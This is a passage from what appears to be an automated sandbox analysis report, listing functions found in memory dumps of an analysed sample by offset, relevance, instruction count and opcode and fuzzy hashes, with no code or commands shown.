                                                            • API String ID:
                                                            • Opcode ID: a0548fb886df188f5d39e37345db218691f82925f423b28f579aeff7d9d8486c
                                                            • Instruction ID: 342def414bb0acda9823e70ebdf9cd607053ce1cbac9915783b1653d30da7074
                                                            • Opcode Fuzzy Hash: a0548fb886df188f5d39e37345db218691f82925f423b28f579aeff7d9d8486c
                                                            • Instruction Fuzzy Hash: B72134F712C114FDA241D5922A50AFA67AFFA87730F31802AF80BD6505D3649A4FC630
                                                            Function 07630C5E Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d245ba18508e993f6f8016111fc1e9921425b95607c8d04989ea4f60126aeff
                                                            • Instruction ID: 7d6f2b67a7ed087347b085ef4d0fd5e096bce8365c018a66886480fd1925215c
                                                            • Opcode Fuzzy Hash: 8d245ba18508e993f6f8016111fc1e9921425b95607c8d04989ea4f60126aeff
                                                            • Instruction Fuzzy Hash: 8911CEFA03C105BCA281D5826B20BFA27AFE69B730F318417F80BD9501D3649A8FC935
                                                            Function 076E015B Relevance: .1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557355679.00000000076E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76e0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4483e160f870993e986cc565a7f3ed490cbe2318d9cc72ec6e4211c5341484b1
                                                            • Instruction ID: 708b74a0957834618bc294373b0b6a5170d500956d0307bc398571d49c438625
                                                            • Opcode Fuzzy Hash: 4483e160f870993e986cc565a7f3ed490cbe2318d9cc72ec6e4211c5341484b1
                                                            • Instruction Fuzzy Hash: 220104EB15E2513CE24395D02B50AFA6B6EE6C3331B358466F403DA542E1DA0B8B0271
                                                            Function 07630C72 Relevance: .1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e171e6131637c37c0c005161b55c09f9f937f67c555b1b625d18b6e594a08b14
                                                            • Instruction ID: 4f04280494179cf1c6d05873ea5aa6ebad563b69d255268cc2832c4db586e638
                                                            • Opcode Fuzzy Hash: e171e6131637c37c0c005161b55c09f9f937f67c555b1b625d18b6e594a08b14
                                                            • Instruction Fuzzy Hash: 2911A0FA03C105FDA24199525A10AFA67AFE69B720F31841AF80B99201D3749A4FC535
                                                            Function 07630C89 Relevance: .1, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77e556f183108c82cdeff5d6a2b11a25e44aa00e4fa0c1f1e1d67a2be1ec7c90
                                                            • Instruction ID: d99fc00b27b0be1a5a993f96d75950e44489d8445d3e25aec39c783cf35ff6d6
                                                            • Opcode Fuzzy Hash: 77e556f183108c82cdeff5d6a2b11a25e44aa00e4fa0c1f1e1d67a2be1ec7c90
                                                            • Instruction Fuzzy Hash: A801A1EA02D105FDA24196525F11BFA67AFE79B720F318416F80BDA105D3749A8FC531
                                                            Function 076E0176 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557355679.00000000076E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76e0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfbd765c9f9c6308ccf5b5747df3437317b566eb546bf014a191a06e71bc43d6
                                                            • Instruction ID: 10b7475fbdc4f53bf4b0d2481e0c70c7248f1360183a549925e4e57dff141583
                                                            • Opcode Fuzzy Hash: dfbd765c9f9c6308ccf5b5747df3437317b566eb546bf014a191a06e71bc43d6
                                                            • Instruction Fuzzy Hash: 390128EB1591113CA14394D06B50AFB6B6EE7C3771B318436F403DA545E1C64A8A01B1
                                                            Function 076E0154 Relevance: .1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557355679.00000000076E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76e0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f248b288e12f776834e8a6a8482794ec749af20b32b56f0c5ad2e1f0facda36a
                                                            • Instruction ID: b2d5d8e588e1bb43e0d72cbb8bcebfd3f35888244dd298190092afe01b430a0a
                                                            • Opcode Fuzzy Hash: f248b288e12f776834e8a6a8482794ec749af20b32b56f0c5ad2e1f0facda36a
                                                            • Instruction Fuzzy Hash: 3A01F7EB16E1113CA143A4C02B50AFF6B6EE6C3371B31C076F403DA546E1D60B8B1171
                                                            Function 07630CC6 Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47fdd4b48a30a61c24de3dda873ddb80924e5cb02e5f9aa14fe2537eac533719
                                                            • Instruction ID: 695519d8777ce1cbf16fef67f4e40a22695b1217269c65f00577454d1c809cbb
                                                            • Opcode Fuzzy Hash: 47fdd4b48a30a61c24de3dda873ddb80924e5cb02e5f9aa14fe2537eac533719
                                                            • Instruction Fuzzy Hash: 3D01F1EA02C514BCA241D1522B247FA27AFE68B730F318017F807EA105D3699B8FC535
                                                            Function 076E018F Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557355679.00000000076E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76e0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1fb9cd3581d80b5fedd2f103fd3551ff626b1fbf6fdcf10d72d209ecc7f41e8a
                                                            • Instruction ID: 7e4bd20940fa53fc00404fb0c76bbd22340831846038f6d5123fa6b0f0331433
                                                            • Opcode Fuzzy Hash: 1fb9cd3581d80b5fedd2f103fd3551ff626b1fbf6fdcf10d72d209ecc7f41e8a
                                                            • Instruction Fuzzy Hash: E6F0F9EB1591103CE143A0D43B506FBAB6EE7C3331B318476F503D6946E1C60B8E1171
                                                            Function 07630C9B Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 137600d1e30c06e8842b901196bc0c58f6203514fb8bd46ce25fec6f0076db19
                                                            • Instruction ID: c7ad828f6655f85f89e20d382b2860f1fd2c95b3071db597fc4a91b6b6969b6c
                                                            • Opcode Fuzzy Hash: 137600d1e30c06e8842b901196bc0c58f6203514fb8bd46ce25fec6f0076db19
                                                            • Instruction Fuzzy Hash: 210192FA12D105BDA641D5925B10BFA27AFE78B720F318416F807EA105D3649E4FC535
                                                            Function 07630CE1 Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 099477c11a937661f3ce004706d93490fcca3add9ebed5ae8ccceced4757e38e
                                                            • Instruction ID: f17fbf7c9da1f7f1b1036af461f07efee05f31c998c03bec0a6c44c15ec4ce87
                                                            • Opcode Fuzzy Hash: 099477c11a937661f3ce004706d93490fcca3add9ebed5ae8ccceced4757e38e
                                                            • Instruction Fuzzy Hash: 2F01F5EA12D145ADE642D5622F247FA6BEEDACB620F31845BE843D9005D3159E4FC230
                                                            Function 07630CAB Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4232c9acde6d9fde4ec853f1c49f893cdff5758665ffc8b15856a76285abd25
                                                            • Instruction ID: b1dd71fe808c2d8e15e81dfc540c9610001a4cdfe9c764f4fe5b94b6a3846b8b
                                                            • Opcode Fuzzy Hash: b4232c9acde6d9fde4ec853f1c49f893cdff5758665ffc8b15856a76285abd25
                                                            • Instruction Fuzzy Hash: B101D2FA12D505FCA281C1426B10BFA66EFE79B720F31841AF807E5001D364AA4FC535
                                                            Function 076E019E Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557355679.00000000076E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76e0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d01035c1a32074bf37cd1e171c5a8b59d203fc3e39e520f7e32c5e6a7c8effe9
                                                            • Instruction ID: 1134e85f59eff17e4228ceb5b8037c6ca0d55899e7a935be1df2c594a409a0be
                                                            • Opcode Fuzzy Hash: d01035c1a32074bf37cd1e171c5a8b59d203fc3e39e520f7e32c5e6a7c8effe9
                                                            • Instruction Fuzzy Hash: 49F0F4EB2591503CE14364D42B90AFBAFAFE7C3371B3184B6F403E6946D5D60B8A5271
                                                            Function 07630D23 Relevance: .1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 921a538263effc443f5238f212b12562357360e6cf26fe13e99754677b1e211a
                                                            • Instruction ID: df081e310c3b0e373d8b6b832fb9940ad5c6d3e98cce39c96f452997da59f8ae
                                                            • Opcode Fuzzy Hash: 921a538263effc443f5238f212b12562357360e6cf26fe13e99754677b1e211a
                                                            • Instruction Fuzzy Hash: 520124EA12D145ACE642D1621F10BFA6BEEAA8B730B31841BE803D9006D3189A4FC234
                                                            Function 07630D05 Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b01e58b0afbeb1187934ac2019905b3ee14044ecae4d1b2fa44a09d34fd09e8
                                                            • Instruction ID: df32f44065ae6bf2d73776c3f22f36e28bc0a24896c9efaa6912b0d6b5226eff
                                                            • Opcode Fuzzy Hash: 2b01e58b0afbeb1187934ac2019905b3ee14044ecae4d1b2fa44a09d34fd09e8
                                                            • Instruction Fuzzy Hash: 6101A2FA22D105BDE201D5526F10BFB67EED78B720F718426F803E9044D3659A8F8574
                                                            Function 076E01CB Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557355679.00000000076E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76e0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 594377e44a7d356f3f3e4fb01e3bdfdc9ea34c9f1fc9b738e6dc6ff9865ab343
                                                            • Instruction ID: 9901d06b784a11b2a9b1cbc5f763e256e1f901e8a8febec179a5ad9bc6e94ce9
                                                            • Opcode Fuzzy Hash: 594377e44a7d356f3f3e4fb01e3bdfdc9ea34c9f1fc9b738e6dc6ff9865ab343
                                                            • Instruction Fuzzy Hash: 5EE065EF1891543CF182A1C52B10AFB9AAEF3C3330A318037F803D2942D1C60B9D2171
                                                            Function 076E01D9 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557355679.00000000076E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_76e0000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a3368530ed4e837ba8970c1496f42e347b81ac45d8305f0cc2409ac7f088fa1
                                                            • Instruction ID: 8f6614d23b58047da242ec60b05ccc7e1fa5e7c847cb02dca51fa5f48c4ac892
                                                            • Opcode Fuzzy Hash: 4a3368530ed4e837ba8970c1496f42e347b81ac45d8305f0cc2409ac7f088fa1
                                                            • Instruction Fuzzy Hash: D7E048FB1491503CB092A0C53F55AF7AAAEF5C37302358427F407D2A45D5CA0F9D1171
                                                            Function 07630D48 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2557144294.0000000007630000.00000040.00001000.00020000.00000000.sdmp, Offset: 07630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7630000_pCElIX19tu.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bcfa8ac725ceeac62ab1ff2ba7558335e377a17683cb31909db361032447273e
                                                            • Instruction ID: dd2bbec230e53039e706cbcba28b270716a7543ef28c06ce0e0d44ce79df6d20
                                                            • Opcode Fuzzy Hash: bcfa8ac725ceeac62ab1ff2ba7558335e377a17683cb31909db361032447273e
                                                            • Instruction Fuzzy Hash: 92E065F552D105ECE241D5519E107FE27FAEB8B710F724466E803A5009D365AE4FC574